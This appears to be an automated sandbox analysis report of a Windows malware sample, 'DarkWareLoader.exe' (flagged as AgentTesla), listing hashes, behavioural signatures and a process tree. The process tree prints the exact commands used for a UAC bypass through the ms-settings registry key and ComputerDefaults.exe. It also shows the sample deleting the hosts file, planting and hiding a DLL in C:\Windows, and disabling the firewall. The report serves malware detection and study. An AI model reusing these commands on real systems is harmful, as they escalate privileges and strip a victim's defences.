Analysis
-
max time kernel
147s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
31/08/2024, 17:22
Static task
static1
Behavioral task
behavioral1
Sample
DarkWareLoader.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
DarkWareLoader.exe
Resource
win10v2004-20240802-en
General
-
Target
DarkWareLoader.exe
-
Size
2.3MB
-
MD5
c42b185841679c16a7aed9ccf48e0d0d
-
SHA1
0c6ad1cc0e6e8706c5913a8604d42449549c4da3
-
SHA256
03bb14890ec3a3cdf397f6af5e87d4cdf122b564a64f89c5b6672e5cbcc57b01
-
SHA512
c8ce057772905b620a9ea1910ce72410d49b327ce5256a6cf594d4a1df17bb3eed4a2b6664988c755b58ec31ee6e76ba87230edeb56c574e3b8bd0ff5c63135f
-
SSDEEP
49152:4CI01yYHlo9MayICF/Xo1U7AZecga2jp:4CIAyYFS8w3UJd
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral2/memory/3812-34-0x0000000006880000-0x0000000006A92000-memory.dmp family_agenttesla -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation DarkWareLoader.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 3336 concv1.exe 3812 DarkWare.exe 3940 CuteCats.jpeg -
pid Process 388 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 31 raw.githubusercontent.com 32 raw.githubusercontent.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3512 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3940 CuteCats.jpeg 3940 CuteCats.jpeg -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\ntshrui.dll attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkWare.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion DarkWare.exe -
Modifies registry class 55 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\638310.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\962583.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\26739.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\29757.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\400892.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 388 powershell.exe 388 powershell.exe 388 powershell.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 3940 CuteCats.jpeg 3940 CuteCats.jpeg 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe 2468 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4024 DarkWareLoader.exe Token: SeDebugPrivilege 3812 DarkWare.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeIncreaseQuotaPrivilege 388 powershell.exe Token: SeSecurityPrivilege 388 powershell.exe Token: SeTakeOwnershipPrivilege 388 powershell.exe Token: SeLoadDriverPrivilege 388 powershell.exe Token: SeSystemProfilePrivilege 388 powershell.exe Token: SeSystemtimePrivilege 388 powershell.exe Token: SeProfSingleProcessPrivilege 388 powershell.exe Token: SeIncBasePriorityPrivilege 388 powershell.exe Token: SeCreatePagefilePrivilege 388 powershell.exe Token: SeBackupPrivilege 388 powershell.exe Token: SeRestorePrivilege 388 powershell.exe Token: SeShutdownPrivilege 388 powershell.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeSystemEnvironmentPrivilege 388 powershell.exe Token: SeRemoteShutdownPrivilege 388 powershell.exe Token: SeUndockPrivilege 388 powershell.exe Token: SeManageVolumePrivilege 388 powershell.exe Token: 33 388 powershell.exe Token: 34 388 powershell.exe Token: 35 388 powershell.exe Token: 36 388 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2468 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4024 wrote to memory of 3336 4024 DarkWareLoader.exe 84 PID 4024 wrote to memory of 3336 4024 DarkWareLoader.exe 84 PID 4024 wrote to memory of 3812 4024 DarkWareLoader.exe 85 PID 4024 wrote to memory of 3812 4024 DarkWareLoader.exe 85 PID 4024 wrote to memory of 3812 4024 DarkWareLoader.exe 85 PID 3336 wrote to memory of 2920 3336 concv1.exe 90 PID 3336 wrote to memory of 2920 3336 concv1.exe 90 PID 2920 wrote to memory of 4824 2920 cmd.exe 92 PID 2920 wrote to memory of 4824 2920 cmd.exe 92 PID 3336 wrote to memory of 2660 3336 concv1.exe 95 PID 3336 wrote to memory of 2660 3336 concv1.exe 95 PID 2660 wrote to memory of 2852 2660 cmd.exe 97 PID 2660 wrote to memory of 2852 2660 cmd.exe 97 PID 2660 wrote to memory of 3608 2660 cmd.exe 98 PID 2660 wrote to memory of 3608 2660 cmd.exe 98 PID 3336 wrote to memory of 2332 3336 concv1.exe 99 PID 3336 wrote to memory of 2332 3336 concv1.exe 99 PID 2332 wrote to memory of 4684 2332 cmd.exe 101 PID 2332 wrote to memory of 4684 2332 cmd.exe 101 PID 4684 wrote to memory of 2984 4684 ComputerDefaults.exe 102 PID 4684 wrote to memory of 2984 4684 ComputerDefaults.exe 102 PID 2984 wrote to memory of 3032 2984 wscript.exe 104 PID 2984 wrote to memory of 3032 2984 wscript.exe 104 PID 3336 wrote to memory of 2352 3336 concv1.exe 107 PID 3336 wrote to memory of 2352 3336 concv1.exe 107 PID 3336 wrote to memory of 4040 3336 concv1.exe 109 PID 3336 wrote to memory of 4040 3336 concv1.exe 109 PID 4040 wrote to memory of 3004 4040 cmd.exe 111 PID 4040 wrote to memory of 3004 4040 cmd.exe 111 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 3336 wrote to memory of 2468 3336 concv1.exe 115 PID 2468 wrote to memory of 3876 2468 dllhost.exe 116 PID 2468 wrote to memory of 3876 2468 dllhost.exe 116 PID 3876 wrote to memory of 2304 3876 cmd.exe 118 PID 3876 wrote to memory of 2304 3876 cmd.exe 118 PID 2468 wrote to memory of 2348 2468 dllhost.exe 119 PID 2468 wrote to memory of 2348 2468 dllhost.exe 119 PID 2348 wrote to memory of 5104 2348 cmd.exe 121 PID 2348 wrote to memory of 5104 2348 cmd.exe 121 PID 2348 wrote to memory of 640 2348 cmd.exe 122 PID 2348 wrote to memory of 640 2348 cmd.exe 122 PID 2468 wrote to memory of 1148 2468 dllhost.exe 123 PID 2468 wrote to memory of 1148 2468 dllhost.exe 123 PID 1148 wrote to memory of 4156 1148 cmd.exe 125 PID 1148 wrote to memory of 4156 1148 cmd.exe 125 PID 4156 wrote to memory of 3704 4156 ComputerDefaults.exe 126 PID 4156 wrote to memory of 3704 4156 ComputerDefaults.exe 126 PID 3704 wrote to memory of 4684 3704 wscript.exe 127 PID 3704 wrote to memory of 4684 3704 wscript.exe 127 PID 2468 wrote to memory of 1996 2468 dllhost.exe 129 PID 2468 wrote to memory of 1996 2468 dllhost.exe 129 PID 2468 wrote to memory of 5100 2468 dllhost.exe 131 PID 2468 wrote to memory of 5100 2468 dllhost.exe 131 PID 5100 wrote to memory of 4640 5100 cmd.exe 133 PID 5100 wrote to memory of 4640 5100 cmd.exe 133 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2124 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Users\Admin\AppData\Local\Temp\concv1.exe"C:\Users\Admin\AppData\Local\Temp\concv1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4824
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\962583.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\962583.vbs" /f4⤵
- Modifies registry class
PID:2852
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:3608
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\962583.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts6⤵PID:3032
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\962583.vbs3⤵PID:2352
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
PID:3004
-
-
-
C:\Windows\System32\dllhost.exe"C:\Windows\System32\dllhost.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2304
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\29757.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\29757.vbs" /f5⤵
- Modifies registry class
PID:5104
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:640
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\29757.vbs6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c move "C:\Users\Admin\AppData\Local\Temp\8173767.tmp" "C:\Windows\ntshrui.dll"7⤵PID:4684
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\29757.vbs4⤵PID:1996
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4640
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1928
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3000
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\400892.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:3140
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\400892.vbs" /f5⤵
- Modifies registry class
PID:1364
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:968
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:4272
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:1820
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\400892.vbs6⤵
- Checks computer location settings
PID:852 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C attrib +h "C:\Windows\ntshrui.dll"7⤵
- Hide Artifacts: Hidden Files and Directories
PID:3512 -
C:\Windows\system32\attrib.exeattrib +h "C:\Windows\ntshrui.dll"8⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2124
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\400892.vbs4⤵PID:4852
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:2076
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:832
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:2436
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2920
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\638310.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:1480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\638310.vbs" /f5⤵
- Modifies registry class
PID:4476
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:640
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:1572
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:1060
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\638310.vbs6⤵
- Checks computer location settings
PID:1888 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul7⤵PID:1332
-
C:\Windows\system32\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 08⤵PID:2336
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\638310.vbs4⤵PID:2984
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:2964
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:2404
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:220
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:5016
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\26739.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:4656
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\26739.vbs" /f5⤵
- Modifies registry class
PID:4020
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:768
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:916
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:4084
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\26739.vbs6⤵
- Checks computer location settings
PID:4500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False7⤵PID:2376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\26739.vbs4⤵PID:832
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:2124
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:2720
-
-
-
C:\Windows\system32\cmd.exe/c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul4⤵PID:2252
-
